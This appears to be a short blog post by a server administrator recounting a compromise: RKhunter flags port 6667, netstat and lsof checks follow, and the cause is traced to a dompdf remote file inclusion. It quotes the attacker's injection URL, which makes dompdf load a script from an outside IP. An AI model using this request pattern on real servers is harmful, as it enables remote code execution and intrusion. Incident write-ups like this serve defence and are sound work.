Today I noticed a high CPU usages on one of my servers, and I did get a warning email from RKhunter. The RKhunter log told me that port 6667 was open. After this I did a: netstat -nap | grep 6667 and yes. This did not look good. So I did a: lsof -i tcp:6667 Googling the IP's gave me more info and showed me that it's pointing to same bad scripts. The "hacker" got in through a website on my server that was running dompdf (php code to generate .pdf files) They injected scripts by calling dompdf like this: domain.tld/dompdf/dompdf.php?input_file=http://18.104.22.168/seguridad/myid.jpg? My servers are all running in a XenServer environment, and as I make backups every week I reversed back to one week ago, and dissabled dompdf on that site. I'm now going to look at the "hacked" XenServer backup and see what damage has been done.